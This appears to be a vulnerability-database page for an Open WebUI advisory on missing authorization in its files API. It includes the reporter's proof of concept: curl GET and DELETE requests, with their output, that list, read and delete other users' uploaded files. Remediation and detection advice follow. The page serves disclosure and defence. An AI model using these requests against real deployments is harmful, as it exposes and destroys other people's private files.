Open WebUI CVE-2026-45301
HIGHSeverity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
A missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform.
Details
All files/ related endpoints lack permission checks.
Listing all files
For example, let's see how file listing is implemented: https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L107-L110 https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/models/files.py#L26 Notice the endpoint depends only on an authenticated user check, no file filtering is done to match the uploaded files' user_id to the requesting user.
This problem repeats itself throughout the various route implementations, allowing any user to perform actions on any file. Some note worthy functions:
Accessing the content of any file
https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L173-L193
Deleting any file
https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L224-L241
PoC
Configuration
- I ran a clean install of the latest version using one of the docker one-liners on an Ubuntu desktop:
docker run -d -p 3000:8080 -v ollama:/root/.ollama -v open-webui:/app/backend/data --name open-webui --restart always ghcr.io/open-webui/open-webui:ollama
- I created an admin user
- I created a second user to act as the threat actor with no elevated permissions
- Admin user uploaded
test.txtin a conversation with model - Admin user uploaded
mydeepest_secret.docxin a conversation with model
Listing files uploaded by other users
- Login to threat actor
- Perform a GET request to
/api/v1/files/
curl -X 'GET' \
'http://localhost:3000/api/v1/files/' \
-H 'accept: application/json'[
{
"id": "b9733e9c-0714-4425-8915-d0361bf66dfc",
"user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1",
"filename": "b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt",
"meta": {
"name": "test.txt",
"content_type": "text/plain",
"size": 4,
"path": "/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt"
},
"created_at": 1724709202
},
{
"id": "8f058e18-fec1-4b9f-bb4e-c17f39d03c98",
"user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1",
"filename": "8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx",
"meta": {
"name": "mydeepest_secret.docx",
"content_type": "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
"size": 6485,
"path": "/app/backend/data/uploads/8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx"
},
"created_at": 1724710236
}
]Accessing other users' file content
- Login to threat actor
- Perform a GET request to
/api/v1/files/{id}/content
curl -X 'GET' \
'http://localhost:3000/api/v1/files/b9733e9c-0714-4425-8915-d0361bf66dfc/content' \
-H 'accept: application/json'wowDeleting another user's uploaded file
- Login to threat actor
- Perform a DELETE request to
/api/v1/files/{id}
curl -X 'DELETE' \
'http://localhost:3000/api/v1/files/8f058e18-fec1-4b9f-bb4e-c17f39d03c98' \
-H 'accept: application/json'{
"message": "File deleted successfully"
}- We will verify this action by furthur listing all files as mentioned above:
[
{
"id": "b9733e9c-0714-4425-8915-d0361bf66dfc",
"user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1",
"filename": "b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt",
"meta": {
"name": "test.txt",
"content_type": "text/plain",
"size": 4,
"path": "/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt"
},
"created_at": 1724709202
}
]Impact
Having access to user uploaded files, regardless of ownership or permission level, breaks the confidentiality of sensitive data stored by users. Furthermore, the ability to delete other user's uploaded files disrupts the integrity of the system.
Personal Notice
In case this submission does get recognized and numbered as a CVE I'd perfer to be credited by my full name - Yuval Gal, instead of my GitHub handle.
Thanks in advance and have a good week (:
Credits
This vulnerability was reported by Yuval Gal (GitHub: @vi11ain).
AnalysisAI
Horizontal privilege escalation in Open WebUI versions through 0.3.15 allows any authenticated user to enumerate, read, and delete all files uploaded by all other users via missing authorization checks in the files API endpoints. The vulnerability requires only low-privilege authenticated access to the web interface and has publicly available exploit code with a detailed proof-of-concept demonstrating how attackers can list all uploaded files regardless of owner, retrieve file contents, and delete arbitrary user files. Organizations running multi-user Open WebUI deployments face immediate risk of data breach and integrity loss, as file upload features in conversational AI platforms commonly handle sensitive documents and internal communications.
Technical ContextAI
Open WebUI is a Python-based web interface for large language model platforms like Ollama, distributed via PyPI (pkg:pip/open-webui) and deployed commonly via Docker containers. The vulnerability stems from insecure direct object reference (IDOR) flaws classified under CWE-284 (Improper Access Control) in the FastAPI-based backend router implementation. The /backend/apps/webui/routers/files.py endpoints (GET /api/v1/files/, GET /api/v1/files/{id}/content, DELETE /api/v1/files/{id}) authenticate users via session tokens but fail to verify that the authenticated user owns or has permission to access the requested file resource. The database model in files.py retrieves file records without filtering by user_id, creating a classic broken object-level authorization flaw. File metadata includes full filesystem paths in the JSON response, further exposing internal storage architecture. This architectural flaw affects all file-handling endpoints uniformly, indicating systemic authorization logic failure rather than isolated coding errors.
RemediationAI
Upgrade immediately to Open WebUI version 0.3.16 or later, which includes authorization checks in the file API endpoints per the vendor advisory at https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33. For Docker deployments, pull the latest image and restart containers with version tags 0.3.16+. For PyPI installations, run 'pip install --upgrade open-webui>=0.3.16' and restart the application service. If immediate patching is not feasible, implement network-level access controls to restrict the /api/v1/files/ endpoint paths to trusted IP ranges only via reverse proxy rules (nginx/Apache/Traefik), though this provides incomplete protection and may break legitimate functionality. As a temporary measure, disable file upload features entirely in the application configuration if business requirements permit, though this severely limits conversational AI utility. Consider implementing application-layer firewall rules to log and alert on suspicious file enumeration patterns (rapid sequential requests to /api/v1/files/{id}/content with varying UUIDs). After patching, conduct forensic review of application logs to identify potential historical exploitation-search for GET requests to /api/v1/files/ and /api/v1/files/{id}/content from users accessing file IDs they did not create, and DELETE operations against files owned by other user_id values. No known workaround fully mitigates this vulnerability without upgrading.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-284 – Improper Access Control
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-r8wh-8m7r-fh33